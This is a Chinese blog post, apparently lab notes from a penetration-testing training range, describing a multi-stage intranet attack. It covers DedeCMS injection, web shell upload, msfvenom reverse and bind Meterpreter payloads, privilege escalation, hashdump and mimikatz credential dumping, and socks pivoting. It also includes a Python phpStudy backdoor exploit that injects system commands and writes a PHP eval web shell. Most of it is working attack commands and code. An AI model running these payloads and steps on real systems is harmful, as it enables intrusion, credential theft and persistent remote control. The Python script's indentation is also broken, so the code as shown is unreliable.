当前位置: 首页 > news >正文

暗月项目四

项目四-内网渗透

image-20220902101121738

IP 发生改变

10.10.10.134 --> 10.10.10.136

10.10.10.129 --> 10.10.1.129

image-20220902203627017

一、网站漏洞

  1. 信息收集
netdiscover -i eth0 -r 192.168.0.0/24  # 扫描内网主机
nmap -sn 192.168.0.0/24 

image-20220902103310725

  1. 端口扫描
masscan -p 1-65535 192.168.0.134 --rate=1000 # 进行端口扫描
nmap -sC -A 192.168.0.134 -p 80,53,49154,6588,3389,135,21,51464,999 # 端口信息扫描
  1. 访问网站各个端口
1. http://192.168.0.134:999/  # phpadmin
2. http://192.168.0.134:6588/ # 主机大师
3. http://192.168.0.134:80    # 网站
  1. 本地设置
  1. hosts 绑定
    192.168.0.134 www.cc123.com

  2. 修改 kaill 网关

    vi /etc/resolv.conf  
    
  1. 子域名收集
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H
"Host:FUZZ.cc123.com" --hw 53  # wfuzz 穷举子域名

www.cc123.com
ww2.cc123.com
new.cc123.com

二、漏洞测试

1. new.cc123.com

  1. 织梦CMS 系统

  2. 经测试发现会员系统开放 http://new.cc123.com/member

  3. 查看 CMS 系统的版本

http://new.cc123.com/data/admin/ver.txt   # 20150618
  1. 查找指定版本的漏洞
1. 存在注入漏洞,寻找指定版本的 exp ,进行执行
2. 经过执行后得到: 密文 812df726be884ddcfc41 解密:admin7
  1. 在会员登陆界面登陆 admin 账户,上传一句话木马

  2. 使用蚁剑进行连接提权 --》 提权失败

  3. 利用蚁剑上传 SSPXspy 文件,并访问 密码为 admin

  4. 使用 msfvenom 生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.143 lport=12345 -f exe > s.exe
  1. 使用脚本检测目标服务器上可写目录,
# C://Windows/debug/WIA/
# 将s.exe 上传到目标文件夹上
  1. 开启 MSF,开启监听
use exploit/multi/handler 
	set payload windows/meterpreter/reverse_tcp
	set lhost 192.168.0.143
	set lport 12345
	run

# 执行 s.exe 程序
  1. 监听到会话,开始提权
# 利用反弹的会话
getuid  # 获取权限
background # 退出
use post/multi/recon/local_exploit_suggester  # 利用模块查找目标可利用漏洞
	set session 1 # 设置会话标识
	run 
# 利用查找到的模块: 
use exploit/windows/local/ms16_075_reflection_juicy
	set session 1
	run
getuid  # 查看当下权限

2. ww2.cc123.com

  1. 利用工具 gobuster 扫描
# 目录扫描
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"  

扫描得到一个后台: http://ww2.cc123.com/admin 管理后台

  1. 利用漏洞: 输入账号 admin’ – 即可登陆

  2. 利用 sqlmap 测试注入

sqlmap -r cc123 --dbms mssql -v 1 --bat  # 测试注入
sqlmap -r cc123 --dbms mssql -v 1 --dbs  # 列出库
sqlmap -r cc123 --dbms mssql -v 1 --os-shell # 获取 mssql shel1

3. 多重网段内网渗透

前提: 获取到了 sql数据库以及 WEB 服务器权限

  1. 信息收集

    1. WEB 服务器

      1. IP:

        192.168.0.134
        10.10.10.135
        
      2. 路由

        run get_local_subnets  # 查看内网 IP 段
        Local subnet: 10.10.10.0/255.255.255.0
        Local subnet: 192.168.0.0/255.255.255.0
        
      3. 哈希以及明文密码

        migrate 1580 # 迁移进程。目标进程也许为 SYSTEm
        run hashdump # 获取 hash
        
        load mimikatz  # 载入 mimikatz
        kiwi_cmd -f samdump::hashes  或者  mimikatz_command -f samdump::hashes
        kiwi_cmd -f sekurlsa::searchPasswords 或者 mimikatz_command -f sekurlsa::searchPasswords
        
        # 整理
        creds_wdigest   wdigest
        creds_tspkg   tspkg
        
  2. 添加路由多重网段渗透 10.10.10.136

    run autoroute -s 10.10.10.0/24  # 添加路由
    run autoroute -p   # 查看
    
    background
    # 启动 socks 代理 
    use auxiliary/server/socks_proxy 
    	set srvport 2222
    	run
    
    # 使用 proxychains 配置文件
    vi  /etc/proxychains4.conf
    socks4 127.0.0.1 2222
    
    proxychains nmap -sT -Pn 10.10.10.136  # 使用 proxychains 调用 nmap 扫描
    
  3. 多重网段渗透 数据库服务器 10.10.10.134

    1. 生成正向连接载荷
    	msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
    	use exploit/multi/handler
        set payload windows/meterpreter/bind_tcp
        set RHOST 10.10.10.134
        set  lport 13777
        run
    
  4. 多重网段内网渗透获取数据库服务器哈希和明文

    migrate 1580 # 迁移进程。目标进程也许为 SYSTEm
    run hashdump # 获取 hash
    
    load mimikatz  # 载入 mimikatz
    kiwi_cmd -f samdump::hashes  或者  mimikatz_command -f samdump::hashes
    kiwi_cmd -f sekurlsa::searchPasswords 或者 mimikatz_command -f sekurlsa::searchPasswords
    
    # 整理
    creds_wdigest   wdigest
    creds_tspkg   tspkg
    
    run get_local_subnets  # 查看内网 IP 段
    run autoroute -s 10.10.1.0/24  # 添加路由
    run autoroute -p   # 查看
    background
    
  5. 多重网段内网渗透第三层网络渗透目标WEB服务器

    # 启动 socks 代理 
    use auxiliary/server/socks_proxy 
    	set srvport 8888
    	run
    
    # 使用 proxychains 配置文件
    vi  /etc/proxychains4.conf
    socks4 127.0.0.1 8888
    
    proxychains nmap -sT -Pn 10.10.1.129  # 使用 proxychains 调用 nmap 扫描
    

    对于 10.10.1.129 网站进行探索发现 80 端口为 phpstudy

    1. python 编写 phpstudy exp

      #conding:utf-8
      import requests
      import re
      import sys
      import base64
          shell = "system('"+(sys.argv[1])+"');"
          shell1 = base64.b64encode(shell.encode('utf-8'))
          #shell1 =
          "ZmlsZV9wdXRfY29udGVudHMlMjglMjdtb29uJTI3JTJDJTI3JTNDJTNGcGhwJTIwZXZhbCUy
          OCUyNF9QT1NUJTVCJTIybW9vbiUyMiU1RCUyOSUzQiUzRiUzRSUyNyUyOSUzQg=="
          header={'accept-charset':shell1,'Accept-Encoding':'gzip,deflate'}
          def exploit(url):
              html=requests.get(url=url,headers=header).text
              return html
          print(exploit('http://10.10.1.129/'))
          
      # 写入 shell
      proxychains3 python3 phpstudy.py "echo ^<?php
          @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
      
    2. SocksCap代理访问目标WEB服务器

    3. metasploit正向连接目标WEB服务器

      msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
      	use exploit/multi/handler
          set payload windows/meterpreter/bind_tcp
          set RHOST 10.10.1.129
          set lport 13777
          run 
      
    4. SocksCap代理访问目标WEB服务器

    5. metasploit正向连接目标WEB服务器

      msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
      	use exploit/multi/handler
          set payload windows/meterpreter/bind_tcp
          set RHOST 10.10.1.129
          set lport 13777
          run 
      

相关文章:

  • 目标检测——关键点检测学习记录(三):人体骨骼点检测——自底向上
  • 隐私计算+区块链原生融合之后平台开放、提升性能,蚂蚁链隐私协作平台FAIR重磅架构升级
  • Loki 收集Nginx日志以 grafana 可视化展示
  • 异常与错误处理高级用法
  • Java学习----Map接口
  • 设计模式-概述. 类图.软件设计原则详细讲解
  • 条件渲染(v-if、v-show)、列表渲染(v-for)、列表中key的原理和作用、列表过滤(filter)、列表排序(sort)
  • openarena
  • 【蓝桥杯省赛真题37】Scratch三国演义字数统计 少儿编程scratch编程蓝桥杯省赛真题讲解
  • Linux内核设计与实现 第三章 进程管理
  • Exception in thread “main“ java.lang.NoClassDefFoundError: org/apache/flink/
  • springboot项目整理(持续更新)
  • Linux Shell重定向 管道命令 awk编程 sed文件操作高阶函数
  • jQuery表单选择器:快速选择input标签
  • 6、Java——三种方式循环出水仙花数
  • #Java异常处理
  • [译]CSS 居中(Center)方法大合集
  • 【162天】黑马程序员27天视频学习笔记【Day02-上】
  • 【跃迁之路】【585天】程序员高效学习方法论探索系列(实验阶段342-2018.09.13)...
  • 【跃迁之路】【641天】程序员高效学习方法论探索系列(实验阶段398-2018.11.14)...
  • CSS魔法堂:Absolute Positioning就这个样
  • happypack两次报错的问题
  • JavaScript学习总结——原型
  • Java比较器对数组,集合排序
  • js数组之filter
  • Linux Process Manage
  • PaddlePaddle-GitHub的正确打开姿势
  • Vue.js 移动端适配之 vw 解决方案
  • 大快搜索数据爬虫技术实例安装教学篇
  • 开年巨制!千人千面回放技术让你“看到”Flutter用户侧问题
  • 聊聊directory traversal attack
  • 实现菜单下拉伸展折叠效果demo
  • 树莓派 - 使用须知
  • 数据仓库的几种建模方法
  • Nginx实现动静分离
  • 基于django的视频点播网站开发-step3-注册登录功能 ...
  • ​HTTP与HTTPS:网络通信的安全卫士
  • ​LeetCode解法汇总2304. 网格中的最小路径代价
  • ​力扣解法汇总1802. 有界数组中指定下标处的最大值
  • #etcd#安装时出错
  • %check_box% in rails :coditions={:has_many , :through}
  • (Repost) Getting Genode with TrustZone on the i.MX
  • (二)丶RabbitMQ的六大核心
  • (南京观海微电子)——I3C协议介绍
  • (三分钟)速览传统边缘检测算子
  • (一)搭建springboot+vue前后端分离项目--前端vue搭建
  • ******之网络***——物理***
  • ***检测工具之RKHunter AIDE
  • .net core 6 使用注解自动注入实例,无需构造注入 autowrite4net
  • .NET MVC、 WebAPI、 WebService【ws】、NVVM、WCF、Remoting
  • .NET 的程序集加载上下文
  • .net 开发怎么实现前后端分离_前后端分离:分离式开发和一体式发布
  • .NET 使用 JustAssembly 比较两个不同版本程序集的 API 变化
  • .NET/C# 编译期能确定的字符串会在字符串暂存池中不会被 GC 垃圾回收掉
  • .NET框架类在ASP.NET中的使用(2) ——QA